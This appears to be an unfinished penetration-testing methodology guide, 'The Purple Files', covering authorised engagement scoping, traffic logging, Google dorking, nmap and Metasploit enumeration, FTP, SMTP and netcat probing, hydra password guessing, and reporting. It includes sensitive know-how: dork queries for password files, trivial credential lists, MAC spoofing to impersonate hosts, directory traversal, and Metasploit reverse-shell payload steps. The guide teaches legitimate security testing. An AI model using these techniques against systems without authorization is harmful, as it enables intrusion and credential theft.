The understanding that many of the tasks included in a pentest can results in the remote compromise of the system, disruption of the systems operation, denial of services conditions, and the alteration of data and/or code. There is no intention on the part of R&C to cause disruption to any system, but many techniques and exploits can destabilize a system leading to the interruption of services/availability, or the alteration of files (data, code...). A verified plan and resources necessary to recover from any type of disruption must be in place before the active engagement begins.
Technique Limitations:
Identify those that are required, optional, or prohibited. DoS, Social Engineering, Password guessing, Remote shell, acquiring identifiable information, placing payload files. Note that avoiding being logged, tampering with logs, altering production/system data or code, all considered out-of-scope.
Goals:
Identify and report vulnerabilities, compromises, and enticements.
Deliverables:
A PDF report of the findings and suggested remediation that will allow the client to address all identified issues.
Important - Consider updating the instance of Kali Linux that will be used during each engagement. This will also update the tools bundled in Kali for pentesting. This is accomplished by running the following command(s) at the Kali shell console as the root. See the apt-get manpage for details.
♦ sudo apt-get update ♦ sudo apt-get upgrade ♦ sudo apt-get dist-upgrade
You might also want to install LibraOffice to work with the report documents and templates provided with The Purple Files. This can be done by running the following commands, as root, from a terminal:
♦ sudo apt-get update ♦ sudo apt-get install LibreOffice
The Purple Files are a collection of files that are each located in a specific directory structure. This structure helps make The Purple Files self-contained in that it does not rely on files outside of that directory structure. That also makes it portable in that you can copy that directory struction to any location you like and use it there.
┌─ThePurpleFiles/ (The Directory Root)
├── data/ (data files such as lists)
├── documents/ (templates and more detailed information)
├── js/ (JavaScript files)
├── pics/ (Images)
├── Workspace/ (All files created during an engagement)
├── favicon.ico (Webpage icon)
└── ThePurpleFiles.html (Main Page)
Within The Purple Files directory structure there is a workspace directory at the root. Workspace is used to store all the files created, intel gathered, results produced, reports, along with any other files created during an engagement. After an active scanning and probing has concluded, each file in the workspace directory should have an sha512sum hash generated and recorded and saved for future comparison. The workspace directory can then be compressed and archived as needed.
For each engagement workspace should start empty. After an engagement the contents of workspace should have an sha512sum hash run for each file and saved for future comparison. See the Housekeeping section for more information and an example.
Then all commands should be run from within workspace.
So before launching any commands or taking any notes, change to the Workspace directory.
There are times you may want to set your MAC address (https://en.wikipedia.org/wiki/MAC_address) of the host you are using so that it will appear to be some other type of device. This can better position you to access a target, and give you a degree of anonymity. You can also impersonate another host on the network by setting your MAC to the MAC address of a legitimate host on the network. Keep in mind that duplicate MAC addresses will cause problems and trip alerts, so you will want to wait until the other host is offline, or arrange to have it taken offline.
To change your MAC address in Linux, click on the icon to the right to open the detailed instructions and examples.
Ben, this works on most examples, but not all. You need to test all of them in all sections.
Ben, add information on setting the target IP to a single, a range, or a list of IPs. Then add some js to validate the input (the SearchReplace() function). For that matter, validate all of the input here. Also, set the values to null onfocus, and return the default value if no change is made.
As stated earlier, it is critical that you record your observations and findings as they occur. Click on the book icon to the right for more information.
Throughout the pentesting process you will want particular information, findings, actions, milestones and so on to be logged not only into work-files for your reference, but also into the template report so that at the end of the active process your report is practically complete.
Before you run ANY commands, probes, scans of any sort you should begin to record in detail your activity. This means keeping a notes file that documents your actions and observations, and a couple other techniques shown below.
For one, you want to log in detail all traffic your host transmits and receives across your network connection. This can be done using the tcpdump utility.
Having a detailed log of all communication between you the pentester and any other host, as well as the background chatter that occurs on every network will be invaluable if you need to explain it prove any if your actions or the behavior of the tools you employed.
This log should be stored in the workplace directory and a sha512sum hash generated and archived with all of the other files in workspace. The sha512sum hash value can be used to show that the contents of the hashed material has not been altered in any way.
You will want to open a terminal and change to the workspace directory. Assuming you installed/copied The Purple Files into your root directory you can use the following command to move into the workspace directory.
The tcpdump must be run as root. The parameters show below. You can run tcpdump with no parameters to get the cheat sheet describing all possible parameters. -i wlan0 (the interface is wlan0) -B 8192 (the buffer is increased in size from 2048 to 8192 to avoid dropping packets) -s0 (snap length is set to "all bytes" so that each packet is captured completely rather than just the first portion) -w (name of file in which to store the captured packets)
You can determine the interface (-i parameter) with the following command:
You can include the client name and start datetime stamp in pcap's filename using the following example.
After all of your activity is finished, close the tcpdump program using Cntl+c. This will result in a short report on how many bytes were captured or dropped.
You should also consider running the script command in the console window you are working in so as to capture both the commands and their results. You can also use the on 'script' and to create an output log of the different commands and responses displayed in a terminal so they can be copied into the template report. Note that the point is not to fill the report with commands and results, but rather to capture all commands and responses into a log(s) of some sort and then copy the relevant portions into the report's profile, observations, and intrusion sections. The point is not how the issue was found/leveraged, but the existence of the issue and its remediation.
The script command, when logged to an output file, will auto-include a timestamp when the logging begins and when it ends. In the example below, the '-a' parameter instructs script to append output if the filename already exists. It is best to change 'filename.txt' to something that discribes its contents such as; console.log.YYZ.company.txt
Example of the script command (as with most command line programs, the --help parameter will display the supported parameters):
To terminate the script process and stop recording the terminal activity, press Ctrl+D
The goal of the Reconnaissance section is to gather as must useful information as you can from sources primarily other than the target itself.
That information will be used in the Exploit section to select specific exploits to consider and how they should be configured.
There is typically little to be cautious about during Reconnaissance since you are performing well-behaved queries of public sources of information. There should be no attacks launched or unauthorized access involved in your Reconnaissance activities.
It is important to record most of the information you discover. While some information may appear directly applicable to your pentesting, some may not appear to be relevant. You will want to record most, if not all, of the information you discover because you cannot be sure what information you can leverage until you are in the attack section. In some cases the information you discover should be included in the final report to make the client aware of what can be discovered by anyone and then leveraged against them. Information leakage is itself a vulnerability that does not have an "attack" associated with it, only the discover is important and is itself the "attack".
Keep in mind that you do not want to limit your investigation to the primary target host. Other hosts may provide several attack vectors, and you want to identify as many as possible. So apply the following tools and techniques to any host that might be a stepping stone to demonstrate compromise and the weaknesses that allow it.
Wayback machine - review historic iterations of web apps and content. This can allow you to look at past iteration of a website. By poking around in older code (view source) you might find information that could assist your review such as comments, passwords, paths, all sorts of things that have since been removed. | |
DNS host - identify domains, aliases, hostnames, IPs... Also MX lookup, blacklists, and email analysis. | |
Whois - identify registrant and contact information | |
Forum discussions - identify information leakage, staff info... | |
"We provide IP address tools that allow users to perform an Internet Speed Test, IP address lookup, proxy detection, IP Whois Lookup, and more." | |
Shodan is the world's first search engine for Internet-connected devices. |
Be sure to record in detail the relevant information you find including the URL where it was found and the datetime you found it. You may need it as a reference, and might need to include it in the final report.
"Google dorking is a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content." (https://www.techopedia.com/definition/30938/google-dorking)
The point here is to search for Information Leakage (confidential or sensitive information that has been posted unintentionally that can help further an intrusion).
There are many types of information you want to look for with these queries.
For example, people crate, use, and post spreadsheets. With MS Excel, when a person creates a new "spreadsheet" it typically has three tabs representing three distinct spreadsheets within that one file. People will work with the first and ignore the other two - but not always. At times, the other two tabs will contain information that is either unknown to the originator, or thought "hidden" by the originator. You will want to search for MS Office file that are associated with the target and review each manually to determine if information has been leaked either in extra spreadsheets, or in the metadata contained in all MS Office files (user names, directory paths, comments, phone numbers, etc)
An aspect of the mindset that best serves a pentester is to see files, data, locations, everything from the perspective of a novice user. We techs tend to look for information where we would hide it, or where another tech would hide it. But the majority of files and materials we review are created, managed, posted, secured... by non-technical users. If some information is out of their site, it is often out of their mind - and they assume out of everyone else's minds. For example, you can still fine passwords written on post-it notes and stuck underneath keyboards! You can still fine passwords included in comments of scripts, html pages, and so on.
So you will want to construct google-dorks that look for file-type along with target identifiers.
Specifiers
♦ filetype - narrow a search to specific types of files such as pdf, txt, xml, odt, doc, sql, zip, and so on ♦ ext - like filetype, but instead looks for files with specific file extension ♦ intext - search the whole page for keywords ♦ allintext - similar to intext, but all keywords must be found ♦ site - restrict the search to a specific website
Examples
Find pages with simple directory listings Index of / Find pages with these strings in their content intext: "intext: Network Vulnerability Assessment Report" intext: "intitle: "index of" password" Find "log" files that contain all of the keywords username password admin allintext:username password admin filetype:log Open FTP service intitle:"index of" inurl:ftp Spreadsheet containing email info filetype:xls inurl:"email.xls" Search a specific site, filetype, and keywords in the content site:targetsite.org filetype:txt password user site:targetsite.org budget filetype:xlsx OR budget filetype:csv
You can find more information about Google Dorking at these sites.
During Enumeration you search public resources for information about the target and its environment. This can include systems logically near the target.
This information will be used to focus subsequent efforts on items and areas that are most likely vulnerable.
Be sure to poke around the general purpose information resource sites as well as sites and services logically near the target.
Enumeration tools include both site specific search facilities, scanning tools, and querying tools.
Be sure to log everything you find, even if it does not seem to be a strong indicator. There are times that several "weak" pieces of information will combine to become much more significant. In other cases, a weak piece of information can assist with other efforts.
Below are several sections that focus on the nmap tool. While most people use nmap as a port scanner, it provides advanced capabilities through the NSE (Nmap Scripting Engine). There are as large number of scripts included with nmap that can do much more than port scanning as you will see in these examples.
Note that for the most part the ports have NOT been set in these examples. For most of the examples below you will need to replace the {targetport} with the actual port(s) you want scanned. Ports can be defined in several ways:
♦ Just one - 80
♦ A list that is comma separated - 80,443,8080
♦ By range - 2000-4096
For detailed information on the nmap program, its uses, and its results double click on the button to the right.
You will usually want to run the three scans illustrated below. They will provide a huge amount of information that will assist in your analysis.
Note that since many of these scans can run for quit awhile, you can always press the space bar (repeatedly) while an nmap scan is running in order to see its current status.
Run at least this scan. This is a full portscan with OS detection and service version detection. This is usually a long running scan.
One of the first scans can be one to simply identify responsive hosts. In this case we will check all IP address from 1-254 for indications there is a host active at each address. Once you know which hosts are responsive, you can focus subsequent nmap scans on just those hosts.
Identify all responsive services and their make/model/version. This, or something similar should be run on every host being reviewed.
Note that the following scan should be run on most HTTP services and not just port 80.
Generate a directory map of the target web site - Make sure the port are set correctly.
Display help for a specific script - Set script name
Run all of the default scripts
Run all of the scripts considered safe
Identify the Web authentication methods - Set page path, and port(s)
Identify HTTP methods - Set port(s)
List and review server headers - Set port(s)
Identify enabled WebDav sites - Set port(s)
Display only the HTML comments - Set port(s)
Scan for default accounts - Set port(s)
Review and investigate the robots.txt file
Display the robots.txt file - Set port(s)
Gather the banner(s) - Set port(s)
A service version scan of specific port(s) - Set port(s)
Query SSL/TLS versions - Set port(s)
Find virtual hosts on an IP address
Brute forces a web server path in order to discover web applications in use
... and here provide a specific basepath
Required! Full portscan with OS ID and service version ID. This will run the longest.
A full SYN portscan
Get the robots.txt page
Generate a sitemap of the website. Provide the homepage URL
Identify the supported HTTP methods
Display the HTML comments in a specific page
Identify the default accounts
Identify web authentication method. Provide the http-auth.path and port
Identify the HTTP headers for a given page. Provide the page URL
Check for WebDav issues. Provide the web-based port(s)
Identify the service versions for specific ports
Identify SSL/TLS versions. Provide the port
Identify the service banner. Provide the port number
Gather service banner for specific port(s)
Scripts by category
Metasploit is an incredible tool. We will be using the portions of metasploit that are useful in enumeration, and then later in the Attack section.
The material below provides a quick and concise guild for using metasploit, but it assumes you are farmiliar with using metasploit. If you are new to metasploit, click on the image to the right to view additional information intended to introduce you to using metasploit. Be sure you are familiar and comfortable with that material before proceeding.
Tips
Resize the console window's width for a more readable display.
Often the output of a command will scroll through several screens of info. Use Shift+PgUp and Shift+Pd to scroll through the output. The arrow keys scroll you through the command history list.
These examples will display the information about each enumeration module rather than launch it. Each module requires specific parameters which must be set before running the module.
You can use this button to generate a new page that contains many of the commands shown below. Each command may have required options that must be included, but afterwards can be saved as an .sh shell script or copied and pasted into a terminal for execution.
Check login
TCP
UDP
. The goal for that step . How that step relates to or assists the other steps . Tips, advice, and warnings about performing each step. . Description of each tool, the value it provides to each step, how it can be run, and how to use it's results. . The types of information that should be logged in each step, what notes to make...
Use the following command to examine the non-exploits available in metasploit. Each directory contains potentially useful modules for each of the protocols listed.
(Directories within the /scanner directory)
acpp, afp, backdoor, chargen, couchdb, db2, dcerpc, dect, discovery, dlsw, dns, elasticsearch, emc, finger, ftp, h323, http, imap, ip, ipmi, jenkins, kademlia, llmnr, lotus, mdns, misc, mongodb, motorola, msf, mssql, mysql, natpmp, nessus, netbios, nexpose, nfs, ntp, openvas, oracle, pcanywhere, pop3, portmap, portscan, postgres, printer, quake, rdp, redis, rogue, rservices, rsync, sap, scada, sip, smb, smtp, snmp, ssh, ssl, steam, telephony, telnet, tftp, udp_scanner_template.rb, upnp, vmware, vnc, voice, vxworks, winrm, x11
While this step is listed in the 'Enumeration' section of our methodology, once you have successfully logged in it could be considered an 'attack'.
Port 21 is used by FTP and sFTP.
Click the image to the right to view the unpacking.html page for an examples and explainations of using ftp.
When port 21 is found open be sure to test it using an FTP client.
The illustration below shows running the ftp client program with the target IP as the only parameter. After a couple of lines where the ftp server identifies its product information, you are prompted for login credentials. Enter the user name 'anonymous', and then for the password, enter any syntactically correct email address. For example; me@here.com, pentester@goodguys.com, or admin@company.org
Note that the commands you enter are in bold.
$ ftp 127.0.0.1 Connected to 127.0.0.1 220 Microsoft FTP server ready. User (127.0.0.1:(none)): anonymous 331 Please specify the password. Password: {An email address} 230 Login successful. ftp>Bye
You will then see if you have successfully logged in or not. If successful you will be at the ftp prompt connected to the target ftp server. Commands you type here are sent to the server and executed there. To exit the FTP program enter the command 'bye'.
At this point it is a good idea to run the command 'help'. The target server will respond with a list of the commands it supports. That tells you what you can work with.
For the most part you will use the 'cd' command to change directory, and the 'ls' command to list the contents of the current directory.
The goal here is to poke through many if not all the directories you have access to to see if you can find any material of interest. You also want to attempt to upload a file to the ftp server to verify that you do or do not have that permission. If this host is a printer, uploading a file may be one way to submit something for printing. So type up an explanitory file and try to upload it. Then refresh to see if it is removed - meaning it was probably printed.
Either anonymous login or file upload permissions should be included in the the report.
Like ftp, sucessfully logging into a telnet server could be considered an attack. Use you descression.
Click the image to the right to view the unpacking.html page for an examples and explanations of using telnet.
In this example port 25 is open. You will usually find many open ports that are not clearly labled or identified. One quick way to poke at them in hopes of finding something of interest is to use the telnet client to attempt to open a session on that port. In many cases you might get a banner, or even a session.
Port 25 is used by SMTP (email post offices). Besides getting a banner, in some cases you can also create and send email through this a telnet session.
In the illustration below, the telnet client is launched using the IP address and port number you want to connect to. The next line is the product and version number as provided by the server. You will want to check the public resources for information on any vulnerabilities know for this product.
Then the command 'HELO' (note the spelling). If all is well, the server will reply with its own 'Hello' message.
Next, the 'MAIL' command is entered with the 'FROM:' parameter.
Next, the 'RCPT' command is entered. This targets the post office the mail is to be delivered to.
Next the 'data' command is entered. This tells the target post office that the following is the body of the mail message.
Enter whatever material you want sent. New lines can be started with a period in the first column. When you are done and press enter, all of the data is sent to the post office and it attempts to deliver your email.
You can then exit the telnet session you have with the target using the command 'quit'.
Note that the commands you enter are in bold.
$ telnet 10.1.1.64 25 220 primaryweb.com Microsoft ESMTP MAIL Service, Version: 4 2.0.3398.7327 ready HELO 250 primaryweb.com Hello [10.1.1.64] HELO williambellamy.com 250 primaryweb.com Hello [10.1.1.64] MAIL FROM: Me@Here.com 250 2.1.0 Me@Here.com....Sender OK RCPT TO: site.com 250 2.1.5 admin@site.com data 354 Start mail input; end with <CRLF>.<CRLF> This is a test. . 250 2.6.0 <NET0301@primarydev.pubdev. site.com> Queued mail for delivery quit 221 2.0.0 primaryweb.com Service closing transmission channel Connection to host lost.
Note that the name 'nc', 'netcat', and 'ncat' all refer to an execuitable program (nc) that was originally written in the 90s. Since then several new rewrites have been released. we will be using the 'ncat' version which comes with the 'nmap' program.
Netcat is a very powerful tool that you should become familiar with. Click the image to the right to view the nc.html page for an examples and explanations of using nc (netcat).
NetCat can be used to probe a web service (along with many others) to see what types of information it will provide.
First run 'ncat' providing the '-vv' for 'very verbose' and '-n' for 'no DNS lookup' as parameters followed by the IP and port of your target.
'ncat' will report wither the port is open or not. If you are returned to the command prompt, the session failed. Otherwise you will have a blinking cursor waiting for input.
Because this is an HTTP service, you need to send the HTTP method, 'HEAD' in this example, followed by the full path to the file you are targeting. In this example we use a simple '/' to indicate the document root of the web server rather than a specific page. After the path we provide the version of HTTP we are willing to use, in this case we use an older version, 'HTTP/1.0', so we do not need to key additional information that newer versions of HTML require.
Press enter (carriage return) twice. This is required by the HTTP protocol. which is the delimiter to tell the interface that this HTTP message is ready to send.
You will usually then receive the HTTP headers and body of the page you pointed to in the path parameter.
You can submit all HTTP methods this way, including OPTIONS, GET, and POST.
Note that the commands you enter are shown in bold.
$ ncat -vv -n 127.0.0.1 80 (UNKNOWN) [127.0.0.1] 80 (?) open HEAD / HTTP/1.0 {second enter key} HTTP/1.0 302 Found Location: https:/// Server: BigIP Connection: close Content-Length: 0 sent 17, rcvd 96: NOTSOCK
Ben, come back here and update this section.
Nikto is one of the web oriented vulnerability scanning tools we use, along with OWASP ZAP proxy as shown below. to run a web site scan
While nikto has a time limit set, it can continue to run long after it has gathered all of the information it will be able to. You can terminate nikto by pressing Ctrl+c.
Be sure to set the correct port number(s) if needed. You can have several ports listed per command as long as they are comma delimited and there is a space after -p.
Run nikto with SSL support - set the host, port, and output filename Do not use SSL - set the host, port, and output filename
ZAP is another web oriented vulnerability scanner. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
In Linux, /usr/bin/zaproxy launches /usr/share/zaproxy/zap.sh
After launching ZAP it will display pop-up windows showing the status of its loading. Then you will be prompted to select the type of session you want as illustrated to the right.
In the top right pane of the ZAP application window you will see this illustration. Simply provide the URL to the application in this pane and click the "Attack" button.
Then after the scan/attack has begun, you will begin to see the structure of the website displayed in the top left pane.
In the bottom pane you can click on the "Alerts" tab to review the list of issues that have been identified. (Click the image to expand)
Finally, you can click on the "Reports" pull-down to select producing the report in HTML or XML format.
Ben, see about a pl to parse the data into the MSWord template, maybe...
Enum4linux is used to enumerate Windows and Samba hosts and is written in Perl. The tool is basically a wrapper for smbclient, rpcclient, net and nmblookup.
Ben, flesh this out.
To get the help info enum4linux.pl [options]ip -U get userlist -M get machine list* -S get sharelist -P get password policy information -G get group and member list -d be detailed, applies to -U and -S -u user specify username to use (default "") -p pass specify password to use (default "" -a Do all simple enumeration (-U -S -G -P -r -o -n -i). -o Get OS information -i Get printer information
In this section we will query and poke at the potential vulnerabilities we have identified to determine if they are exploitable.
At this point we have gathered information about the target (reconnaissance), and specific information about the software it is running (enumeration). That gives us the specific points we want to evaluate for vulnerabilities.
This is probably the most delicate part of performed in a pentest. We want to do what we can to determine if a potential vulnerability is exploitable, but we do not want to do any damage or cause any disruption. The techniques in this section will, in most cases, be a violation of local, state, or federal law if you so not have, in writing dated and signed, adequate and appropriate permission from someone who has the authority to grant you permission to access the system(s) as part of an agreed pentest (security analysis).
Be sure to have contact information on hand for people you can reach out to if you have any questions, suspect a problem, or need to coordinate with in any way. For example, a technique you perform is intended to make some sort of alteration on the target host. It may be helpful to have someone verify that the alteration was in fact made.
There are several tools that will be used in this section to attempt to exploit a vulnerability.
It is critical that during this step you log information and observations as you go. Be sure to have addressed the ways to log your activity covered in the "Record the Engagement" section under the "Preparation" section above. The information to log includes the datetime you launch a tool/technique, the syntax used, the response you receive including the lack of a response, screen shots, error messages, completion messages, literally anything. This information will be necessary if you need to recreate, explain, defend, or for any reason recall your actions and the information you had which you made decisions and took further action.
If any of this scares or conserns you, it should! If anyone, the client, management, law enforcement, or lawyers have questions you want written notes that show in detail the events in question and your rational regarding your actions and responses.
Ben, Make it clear that all the work up to this point was to gather intel that might point to potential vulnerabilities. Here you test, confirm, assume each of them using the tools shown. I need to have a section that also talks about each major attack tool/technique so as to correlate each potential vulnerability with how to probe/test it.
In the attack section and even into the verification section (test for false positives) emphasise checking the main vulnerability databases for remediation information We do not want to fix it for them, we want to give them links and notes that will help them fix it themselves. This not only fixes the issues we have identified, but helps to educate them more about their systems, and how they can be at risk.
Caution - do not attempt any of these step unless you are confident in the expected results and effects a given exploit will have on a target. Unexpected results do occur and are indications of vulnerabilities or deeper problems, but have a clear and detailed expectation before attempting any of these steps.
In this section you use the Target Profile you have built in the report template using the information gathered to this point in order to plan your attack(s). Here you attempt the techniques and exploits that are relevant to the potential vulnerabilities you have identified in order to circumvent or disrupt the target system's security features.
Search for known exploits on the Internet and local databases to flesh out the Target Profile (aka Attack Map) located in the report template in preparation for testing the relevant attack(s).
Ben, In the attack section and even into the verification section (test for false positives) emphasise checking the main vulnerability databases for remediation information We do not wantto fix it for them, we want togive them links and notes that will help them fix it themselves. This notonly fixes the issues we have identified, but helpsto educate them more abouttheir systems, and howthey car be at risk. Considers writing some scripts that auto search most online abs for this info. use online sources as your vul db-
The following sites are worth investigating after you have searched those above.
template
Dorks List - CXSecurity.com. This is another site that lets you search BugTrak and other vulnerability databases.
Note that the searchsploit tool allows searching the local database.
To get help about the searchsploit tool searchsploit --help Search for exploits having to do with 'windows' and 'iis' and '7.5' searchsploit windows iis 7.5
As you are working through a pentest you will find points where you can gain unauthorized access. Something on screen, either graphic or textural will indication the successful access. You will want to record these to demonstrate your presence within that portion of the system. This is not about proving your success, it is about making an impact on the client. Simply saying "We got into your system." is not as effective as screen shots of confidential files, directory structures, administration screens, privileged application screens, and so on. You want to encourage action on the part of the client, and showing them proof that their system can be compromised is a great way to motivate them to address effective remediation.
In this section you gather examples that demonstrate each successful breach of security. This includes screen shots, posted files, captured files, etc...
♦ Copy specific files from a compromised target. If you do this, you need to take extream care not to loose control of any copies or artifacts you might create during the engagement.
♦ Screen shot of remote shell displaying identifiable information. For example, "ipconfig /all", or "dir windows\system32\config".
♦ Acquire/download identifiable information.
♦ Use the script command to record your console session as you navigate through a compromised situation.
♦ Because the tcpdump tool recorded all of the network activity during an engagement, you can use the relevant sections of the pcap file to demonstrate an intrusion.
It is surprisingly common for a service, device, application to be installed and put into production without changing the default credentials to something adequately strong. These default credentials are easily discovered and can immediately lead to a significant intrusion.
Importantly, default credentials on a component that is not considered critical or important is a much a risk as if the component was critical or important. Remember that successful intrusions are seldom accomplished by attacking the target directly. Rather, you establish a foothold somewhere in the target's network and then work your way through different systems until you are in position to compromise the target(s). There is an old saying, 'Once I have a platform inside a network, it is just a matter of time until I own all of your digital assets!'
If you find the default credentials, try them on the target service. If not, then manually try the trivial credentials. Trivial credentials are usernames and passwords that are commonly used as defaults. Below are some examples:
Trivial Account Names The-name-of-the-product, admin, administrater, administrator, adm, root, god, sys, system, operator, backup, bkup, remote... |
Trivial Passwords Remember to try variations on geeking and case. null password, openup, letmein, keepout, toor, account-name, product-name, manufacture-name, Variations on 1234, 4321, 098765, 11111..., Keyboard-patterns qwerty, poiuy, 1qazxsw2, bhu89ijn..., secret, topsecret, private, public... |
There are several default password lists you can refer to:
Be sure to search for the product user manuals, setup manuals, installation manuals... for a specific product/version. These often include the default credentials. Search for things like: filetype:pdf setup manual guide manufacture-name product-name
The data directory in ThePurpleFiles contains a list of common usernames and common passwords. These can be used in many of the password cracking tools.
In fact, many practioners develope their own lists of user account names and passwords to supplement the lists you can find on the Internet.
We talked about Google Dorking back in the Reconnaissance section where it was used to search for background information along with Information Leakage (the unintential loss of control of confidential or otherwise sensitive information). Here, however, we will use Google Dorking to actual attack a system/organization. This may have nothing to do with the specific host we are engaged to attack, but is a quick, easy, and often fruitful technique that should be added to most, if not all, engagements.
Again, these two links are great for general information along with examples of Google Dorking.
Information about the topic of Google Dorking: https://en.wikipedia.org/wiki/Google_hacking
Google Hacking Database https://www.exploit-db.com/google-hacking-database
The difference between using Google Dorks for Reconnaissance and for Attacking is that when attacking, we are looking for information that might lead to an intrusion rather than just Information Leakage.
Now lets see some specific eamples of attacking with Google Dorks:
Ben, include several examples below.
Ben, straighten out these examples and line them up with the actual dictionary files etc... Also, can the output be saved to a report file?
The hydra tool will perform a live real-time password guessing attack against many types of online login systems. While hydra performs online password cracking attacks, offline password cracking is also a very important skill for pentesting. For more information on Password Cracking, click on the image to the right.
Be aware that this will generate a relatively large amount of network traffic and processing at the target. If there is a maximum number of login attemps allowed before locking the account, hydra will usually lock the account out. This is also typically noisy traffic easily identified by Intrusion Detection Systems (IDS).
A very big hole that many attackers enter through is weak authentication. Most often the credentials used and maintained by an application are not as stringent, complex, or changed as network credentials.
The hydra program can be used to point at an online application/service and attempt a series of login attempts using a list of user accounts and a list of possible passwords.
The hydra program uses files that contain account names and files that contain passwords to attempt logging in with every combination.
Ben, develop more of these accounts and password files.
Consider using the user account / password files that are located in the data/ directory. These include the most common and trivial user accounts and passwords for many of the common services.
Not included in these files are what are considered "trivial" credentials. These are usually best tested manually.
Account Names root admin administrator administrater (product name) (account name) |
Passwords (blank) 123(456) password |
The following examples each need to be manually configured before being run. Specifically, you need to set the account names file and passwords file that you want hydra to use.
In addition, you may want to customize both account names and passwords files to better suite each specific target.
HTTP Form Example 1
Example 2
HTTP GET Example 1
Example 2
FTP Example 1
Example 2
SSH Example 1
Example 2
SMB - Windows
MSSQL
Note that there is a large list of custom wordlists in the /usr/share/metasploit-framework/data/wordlists directory. There is also a large repository of passwords located at the following link:
See the Reference section for more information about the hydra program.
The overview:
Do not run an exploit unless you are sure it is relevant to the target, and you understand the intended results. In many cases you may want to be in contact with the client while you run certain attacks so that they can confirm the results, and if necessary restart the host.
Rather than provide ready to run examples, when launching an actual exploit you need to manually configure and run each attack. This helps insure that your are clear on the attack you are about to run and its intended results.
The overall process is as follows (Note that these examples do not copy to the clipboard when double clicked).
Searching for exploits
Make sure you have metasploit version 4.13.8 or after, otherwise the searching function will behave oddly.
The first step is to search for exploits that are relevant to the potential vulnerabilities that were discovered and highlighted in the Target Profile. This is not as simple as it would seem. A given exploit can have several names and descriptions. So you often have to gather the identifying details of an exploit and search for them.
The basic search syntax is:
msf> search <search operator>:<search term>
Ben, change this to a simple link to an external page. ./UsingMetasploit.html
Below is a concise illustration of the typical use of metasploit. Double click the icon to the right for more information on searching for candidate exploits.
Begin by searching for exploits using keywords.
search name:iis
Another approach would be to use the tab completion feature and scroll through all the exploits under that folder.
use exploit/windows/fileformat/ (tab-key)
search name:smb type:exploit platform:windows
You can also visit the rapid7 vulnerability database search page at https://www.rapid7.com/db and provide the search terms and then select "all" database from the pull-down.
search ^windows/.*rpc.* -r good -t exploitYou can also use wildcards:
search -t exploit windows/smb.*ms0
1. Search for a candidate exploit
2. Review each candidate exploit's information
3. Pick an exploit
use (exploit name)
4. Set the required options (show options)
set HOSTREMOTE 127.0.0.1
5. Review and set the target (show targets)
set targets
6. Review and set the payload, usually 'reverse-tcp' (show payloads)
set payloads
Run the exploit
exploit
Evaluate and document the results
Start a new attack process from scratch
back
When you search for a keyword(s) the entire record is queried for the keyword(s).
While running these types of probes, keep an eye out for information leakage in error pages that any of these types of probes might trigger. In fact, when you receive an error page, remember that it is just an HTML page, so inspect the source code itself for information leakage such as copyright dates, comments, paths, and so on.
Backtracking - exploration
These are browser based attacks that are manually attempted to illicit error messages or unexpected results - both of which indicate a vulnerability.
Keep in mind that a browser can attempt to interface with any service on an open port. In some cases it is helpful to open an unusual port to see the response. Web based services are often run to provide administrative or other services outside of an application's primary interface on port 80 or 443.
Refer to the URL manipulations page for detailed examples.
Progressively move up a directory structure to see what you find:
Null bytes - poison payload
Append a null byte: Also try sending a null byte as a parameter:
Value manipulation - poison payload
Alter the value of GET variable to manipulate the pages response:
Directory traversal - exploration
Use all sorts of encodings and variations on ../ to move up and down into other directories:
Directory Listings - exploration
Check Combine directory traversal with directory listings.
"The NTFS file system includes support for alternate data streams. This is not a well known feature and was included, primarily, to provide compatibility with files in the Macintosh file system. Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called :$DATA." (08/09/19 https://www.owasp.org/index.php/Windows_::DATA_alternate_data_stream)
https://www.giac.org/paper/gsec/2803/windows-alternate-data-streams/103828There are a few issues to be concerned about when it comes to older software that you identify in the enumeration step.
The presence of significantly outdated software is not simply an issue of neglectful systems management. Though it does encourage an attacker to probe further, deeper, and longer an the assumption that corners have been cut and best practices not followed in other areas that could be exploited.
New vulnerabilities are reported almost daily that apply not only to the current version of a program, and most/all previous versions. And because, when software is left and not updated for several major versions, it is likely that any available security patches and updates are also left unapplied.
Vulnerabilities in older software are discovered every day. Attackers know that outdated software can be found all over the Internet and in homes and offices of every size and type. So there is a huge incentive to discover vulnerabilities in older versions of software rather than just the most current.
In addition, vulnerabilities found in the most current version of an application is likely to exist in most if not all previous versions of that application.
Outdated software can be present even when the administrator(s) believe that everything is up to date. This can happen when backups are used to restore systems and those programs do not contain updates that were actually applied after that backup was created.
Each time you see an application banner or other information about software, be sure to look for the copyright notice. They are usually dated with the year, which implies when that software was last updated. Often you can find this even if the application version number makes it's age ambiguous.
The purpose of this section is to provide information about the reports that should be produced for each engagement and any meetings intended to share or explain the process, procedures, and results of each engagement. You should begin gathering this information at the beginning of each engagement and then add to it at points where new and pertinent information is discovered.
Now we reach the point of all our efforts. We have worked smart and hard to identify potential vulnerabilities and their probable impact on a system. Now we convey what we have found along with recommendations for addressing each.
There are a few points to keep in mind.
1. Your job is to effectively communicate your findings both written and spoken. The final report that you deliver must be written to at least two audiences. The first is management. Here you want to avoid technical terms and clearly define and illustrate those you do use. (See the end of this section for examples of illustrating technical concepts).
2. You want to give the client information that is clear, understandable, and relevant. But you do not want to make the fixes for the client.
In reporting what you have done and found, you want to avoid padding the report with meaningless information, extraneous graphs, and anything else that does not help to clearly communicate what the client needs to be informed of. Too often reports pander to those levels of management that either approve purchases, or are hoping for enough technobabble to create the appearance of super-techno efforts they can use to advance unrelated agendas.
A little advice, at every preceding point you should have been taking notes, capturing screen shots, noting URL references containing more detailed information, and so on. In effect, you should be writing the final report from the very start of the engagement. If you have to begin the process of reporting now, after finishing all the active scanning and probing, you are only increasing the time and effort you need to expend, and likely reducing the quality of the final report - your deliverable.
Now we reach the point of all our efforts. We have worked smart and hard to identify potential vulnerabilities and their probable impact on a system. Now we convey what we have found along with recommendations for addressing each.
There are a few points to keep in mind.
1. Your job is to effectively communicate your findings both written and spoken. The final report that you deliver must be written to at least two audiences. The first is management. Here you want to avoid technical terms and clearly define and illustrate those you do use. (See the end of this section for examples of illustrating technical concepts).
2. You want to give the client information that is clear, understandable, and relevant. But you do not want to make the fixes for the client.
As you worked through the engagement, applying the methodology, you will have filled out the majority of the report template.
The report template file is located at Template\Template.Pentest.Report.doc
You will have copied the contents of the Template\ to the working directory for each engagement. Be sure to rename the report template to describe the client for each engagement.
